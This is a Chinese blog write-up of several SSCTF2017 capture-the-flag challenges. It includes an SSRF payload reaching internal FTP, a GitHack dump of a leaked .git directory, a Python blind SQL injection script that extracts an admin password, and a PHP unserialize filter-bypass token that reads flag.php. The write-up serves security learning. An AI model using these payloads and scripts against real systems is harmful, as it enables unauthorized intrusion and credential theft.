<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="SSCTF2017部分WP"/>




  <meta name="keywords" content="writeup, ssctf, ssrf, git, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/05/09/SSCTF2017部分WP/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> SSCTF2017部分WP - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          SSCTF2017部分WP
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-05-09
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#自己做的部分"><span class="toc-text">自己做的部分</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#签到题"><span class="toc-text">签到题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#捡吗？"><span class="toc-text">捡吗？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#你知道我在等你么"><span class="toc-text">你知道我在等你么</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag在哪里"><span class="toc-text">flag在哪里</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#看大佬wp复现的部分"><span class="toc-text">看大佬wp复现的部分</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#我们的秘密是绿色的"><span class="toc-text">我们的秘密是绿色的</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CloverSec-Logos"><span class="toc-text">CloverSec Logos</span></a></li></ol></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>上个周末考完大物就回到寝室，尝试着做这个比赛，虽然还很菜,虽然马上又要考试了。。虽然最后有道题已经做出了一半！！ <a id="more"></a></p>
<blockquote>
<p>但是有遗憾有惊喜吧！还是简单记录一些东西。</p>
</blockquote>
<h2 id="自己做的部分"><a href="#自己做的部分" class="headerlink" title="自己做的部分"></a>自己做的部分</h2><h3 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h3><blockquote>
<p>这道题直接给出了一串字符串,直接base64解码<br>这里看到了<span style="color:red;">{}</span>就有一种熟悉的感觉！<br>一开始也没有头绪,不过常见的加密方式就那几种,并且是个签到题,感觉没这么麻烦<br>首先想到的是凯撒移位,因为flag是ssctf{},讲道理应该有ssctf的<br>最后栅栏解密</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSflWD.png" alt="base64解密"><br><img src="https://s1.ax1x.com/2018/01/01/pSf3Se.png" alt="凯撒移位"><br><img src="https://s1.ax1x.com/2018/01/01/pSfuo6.png" alt="栅栏解密"></p>
<h3 id="捡吗？"><a href="#捡吗？" class="headerlink" title="捡吗？"></a>捡吗？</h3><blockquote>
<p>这道题虽然只有100分，但是却引起了尴尬。。。。<br>官方提示ssrf,但是内网地址。。。。最后官方受不了直接给了ssrf过程。。。！<br>主页是个图片，右键源码</p>
</blockquote>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img <span class="attribute">src</span>=<span class="string">" ./news.php?url=127.0.0.1/img.jpg "</span>&gt;</span><br></pre></td></tr></table></figure>
<p>127.0.0.1，已经很明显了，再根据官方提示，poyload</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>//<span class="number">120.132</span><span class="meta">.21</span><span class="meta">.19</span>/news.php?url=<span class="number">10.23</span><span class="meta">.173</span><span class="meta">.190</span>/news.php?url=ftp://<span class="number">172.17</span><span class="meta">.0</span><span class="meta">.2</span>:<span class="number">21</span>/flag.txt</span><br></pre></td></tr></table></figure>
<p>但是这样提交之后，没反应，试了试大写绕过Ftp，读到flag</p>
<h3 id="你知道我在等你么"><a href="#你知道我在等你么" class="headerlink" title="你知道我在等你么"></a>你知道我在等你么</h3><blockquote>
<p>直接下载，<a href="http://pan.baidu.com/s/1bDm2dS" target="_blank" rel="noopener">我存到了云盘</a>密码：pdxn,是一个mp3格式文件，但是打不开，用HxD打开，一看是压缩包<br>直接解压，的到三个文件</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf8QH.png" alt="mp3-zip"></p>
<blockquote>
<p>扫描提示的二维码，<span style="color:red;">神龙摆尾（ps:不是让你看内容！！！）</span><br>有个zip文件是加密的，应该mp3文件含着密码，由于前几天做过一个看波形的题。。。但是没发现什么<br>又想到提示内容，就用HxD打开mp3文件，直接看结尾，可以的字符串，直接解密，开了。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfUTP.png" alt="mp3-2"><br><span style="color:red;">这个地方，在看大佬wp的时候学到了一个新姿势，linux命令strings,可以直接导出文件字符串，具体使用可以百度</span></p>
<blockquote>
<p>解压之后得到一张图片，老套路，16进制打开，试着搜索FF D9,可以从下图容易看出<br>后面是个png,扣数据，保存，注意文件头是坏的，需要修复</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfJOA.png" alt="coffee"></p>
<blockquote>
<p>打开之后还是一个二维码，扫描是下载一个文本，打开之后。。。。。又是PK。。。。。。。。我。。。。无言以对<br>这是个伪加密，改图片处0-&gt;1，解压得到base64，解码，还需要url解码得到flag<br>这个300分真的不好拿。。。。。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfteI.png" alt="伪加密"></p>
<h3 id="flag在哪里"><a href="#flag在哪里" class="headerlink" title="flag在哪里"></a>flag在哪里</h3><blockquote>
<p>打开链接，是个网址，而且下载的是个文件，。。。很令人怀疑啊，为什么还要打开一个网址？？<br>这是我没提交成flag的那道题，一开始并没有思路，第二天，学长提示git源码泄露，才有了思路<br>打开数据包，发现就是一些git，./nijiakadaye，的字样，又搜了搜相关资料<br>果断linux,安装GitHack,并下载源码</p>
</blockquote>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/BugScanTeam/GitHack</span><br><span class="line"><span class="keyword">cd</span> GitHack</span><br><span class="line"><span class="keyword">python</span> GitHack.<span class="keyword">py</span> http://<span class="number">60.191</span>.<span class="number">205.87</span>/.nijiakadaye/</span><br></pre></td></tr></table></figure>
<p>在网址目录打开终端，输入git log -u查看提交历史<br><img src="https://s1.ax1x.com/2018/01/01/pSfMFK.png" alt="GitHack"></p>
<p>直接提交{}内容，不对。。。。。继续往下看，发现了pass.php,直接逆向解密<br><img src="https://s1.ax1x.com/2018/01/01/pSfNwt.png" alt="pass-1"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">wtf</span><span class="params">($data,$pwd)</span> </span>&#123;</span><br><span class="line">    $cipher =<span class="string">""</span>;</span><br><span class="line">    $key[] =<span class="string">""</span>;</span><br><span class="line">    $box[] =<span class="string">""</span>;</span><br><span class="line">    $pwd_length = strlen($pwd);</span><br><span class="line">    $data_length = strlen($data);</span><br><span class="line">    <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; <span class="number">256</span>; $i++) &#123;</span><br><span class="line">        $key[$i] = ord($pwd[$i % $pwd_length]);</span><br><span class="line">        $box[$i] = $i;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> ($j = $i = <span class="number">0</span>; $i &lt; <span class="number">256</span>; $i++) &#123;</span><br><span class="line">        $j = ($j + $box[$i] + $key[$i]) % <span class="number">256</span>;</span><br><span class="line">        $tmp = $box[$i];</span><br><span class="line">        $box[$i] = $box[$j];</span><br><span class="line">        $box[$j] = $tmp;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> ($a = $j = $i = <span class="number">0</span>; $i &lt; $data_length; $i++) &#123;</span><br><span class="line">        $a = ($a + <span class="number">1</span>) % <span class="number">256</span>;</span><br><span class="line">        $j = ($j + $box[$a]) % <span class="number">256</span>;</span><br><span class="line">        $tmp = $box[$a];</span><br><span class="line">        $box[$a] = $box[$j];</span><br><span class="line">        $box[$j] = $tmp;</span><br><span class="line">        $k = $box[(($box[$a] + $box[$j]) % <span class="number">256</span>)];</span><br><span class="line">        $cipher .= chr(ord($data[$i]) ^ $k);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $cipher;</span><br><span class="line">&#125;</span><br><span class="line">$a=<span class="string">'xsL3HOvFlV+H40s0mhszc5t1x38EU0ZIFJHZ/h2sC3U='</span>;</span><br><span class="line">$decrypt=wtf(base64_decode($a),<span class="string">'ssctf'</span>);</span><br><span class="line"><span class="keyword">echo</span> $decrypt;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfGyd.png" alt="pass"></p>
<h2 id="看大佬wp复现的部分"><a href="#看大佬wp复现的部分" class="headerlink" title="看大佬wp复现的部分"></a>看大佬wp复现的部分</h2><h3 id="我们的秘密是绿色的"><a href="#我们的秘密是绿色的" class="headerlink" title="我们的秘密是绿色的"></a>我们的秘密是绿色的</h3><blockquote>
<p>这道题长的姿势也不少的，首先就是题目也要注意，可能会是提示，比如这道，我们的秘密-OurSecret是这个工具<br>这个工具解密是需要密码的，题目提示秘密是绿色，观察图片，绿色部分的数字：0405111218192526</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfdFf.png" alt="绿色"><br><img src="https://s1.ax1x.com/2018/01/01/pSfDSg.png" alt="OurSecret"></p>
<blockquote>
<p>解压之后是个压缩包，提示密码是生日，8位数字爆破</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfhfU.png" alt="提示"><br><img src="https://s1.ax1x.com/2018/01/01/pSfwY8.png" alt="爆破"></p>
<blockquote>
<p>接下来又是新姿势，明文攻击(条件具体可以百度),下面第一张图片也可以算是明文攻击特征吧，将readme相同方式压缩，作为明文文件</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf0fS.png" alt="特征"><br><img src="https://s1.ax1x.com/2018/01/01/pSf5pF.png" alt="明文攻击"><br><img src="https://s1.ax1x.com/2018/01/01/pSfrlQ.png" alt="伪加密"></p>
<blockquote>
<p>解压之后又是伪加密。。。。似乎，充满了二维码，爆破密码，伪加密。。。。。得到下面的东西，和签到一样的手法<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">qddpqwnpcplen%prqwn_&#123;_zz*d@gq&#125;</span><br></pre></td></tr></table></figure></p>
</blockquote>
<h3 id="CloverSec-Logos"><a href="#CloverSec-Logos" class="headerlink" title="CloverSec Logos"></a>CloverSec Logos</h3><blockquote>
<p>首先是盲注，得到admin密码，贴上chamd5团队脚本</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">s = requests.session()</span><br><span class="line">ll = <span class="string">"1234567890qwertyuiopasdfghjklzxcvbnm"</span></span><br><span class="line">username = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">32</span>):</span><br><span class="line">    <span class="keyword">print</span> j</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> ll:</span><br><span class="line">        url = <span class="string">'http://60.191.205.80/picture.php?id=1"%26%26substr((select(passwoorrd)from(user)where(id=1)),'</span>+str(j)+<span class="string">',1)="'</span>+i</span><br><span class="line">        <span class="comment"># print url</span></span><br><span class="line">        <span class="comment"># username = ""</span></span><br><span class="line">        r = s.get(url)</span><br><span class="line">        <span class="comment"># print r.text</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">"Picture  not found"</span> <span class="keyword">not</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            username = username + i</span><br><span class="line">            <span class="keyword">print</span> username</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>然后就是反序列化了，这个题目wp是校内决赛之后加上的。。因为出了一道一样的反序列化问题<br>先看代码部分index.txt和include.txt,这后边是校内决赛代码，ssctf似乎已经关闭了</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;!--index.txt--&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'id'</span>])</span><br><span class="line">&#123;</span><br><span class="line">    header(<span class="string">'Location: index.php?id=1'</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line"><span class="keyword">if</span>($id==<span class="number">0</span>)</span><br><span class="line">  &#123;</span><br><span class="line">      <span class="keyword">if</span>(<span class="keyword">isset</span>($_COOKIE[<span class="string">'token'</span>]))</span><br><span class="line">      &#123;</span><br><span class="line">        $key=$_GET[<span class="string">'key'</span>];</span><br><span class="line">        $token =$_COOKIE[<span class="string">'token'</span>];</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>($key)&amp;&amp;(file_get_contents($key,<span class="string">'r'</span>)===<span class="string">"I want flag!!!"</span>))</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"hello Hacker!&lt;br&gt;"</span>; </span><br><span class="line">          <span class="keyword">include</span>(<span class="string">"include.php"</span>);</span><br><span class="line">          <span class="keyword">echo</span> cumtctf_unserialize($token); </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;  </span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"You are not Hacker ! "</span>;  </span><br><span class="line">        &#125;  </span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;!--include.txt--&gt;"</span>; </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Read</span></span>&#123;<span class="comment">//flag.php</span></span><br><span class="line">    <span class="keyword">public</span> $file;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="string">"flag.php"</span>===<span class="keyword">$this</span>-&gt;file||stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">"://"</span>)&gt;<span class="number">-1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">exit</span>();  </span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file); </span><br><span class="line">            &#125;              </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"you are big Hacker"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">cumtctf_unserialize</span><span class="params">($value)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        preg_match(<span class="string">'/[oc]:\d+:/i'</span>, $value,$matches);</span><br><span class="line">        <span class="keyword">if</span>(count($matches))&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> unserialize($value);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>首先index.txt中get-id，传参id=0</p>
</blockquote>
<p>然后首先看file_get_contents函数，这里要求传入的key=I want flag!!!<br>这里我们能够利用php的<span style="color: red;">封装协议php://input</span>，他能够得到POST原始数据,用火狐很方便</p>
<blockquote>
<p>最后就是对token的操作，由include.txt代码部分可以知道，可以反序列化读取flag.php<br>但是代码中<strong>if(“flag.php”===$this-&gt;file||stripos($this-&gt;file,”://“)&gt;-1)</strong>过滤了flag.php<br>这里可以用./flag.php绕过<br><strong>preg_match(‘/[oc]:\d+:/i’, $value,$matches);</strong>利用符号+就不会正则匹配到数字<br><span style="color: red;">token=O:+4:”Read”:1:{s:4:”file”;s:10:”./flag.php”;}</span></p>
</blockquote>
<p>最终token=O%3a%2b4%3a%22Read%22%3a1%3a%7bs%3a4%3a%22file%22%3bs%3a10%3a%22.%2fflag.php%22%3b%7d</p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/writeup/">writeup</a>
            
              <a href="/tags/ssctf/">ssctf</a>
            
              <a href="/tags/ssrf/">ssrf</a>
            
              <a href="/tags/git/">git</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/05/12/哈希长度扩展攻击/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">哈希长度扩展攻击</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/05/06/Wordpress安装及4.6漏洞问题/">
        <span class="next-text nav-default">Wordpress安装及4.6漏洞问题</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/05/09/SSCTF2017部分WP/';
        this.page.identifier = '2017/05/09/SSCTF2017部分WP/';
        this.page.title = 'SSCTF2017部分WP';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
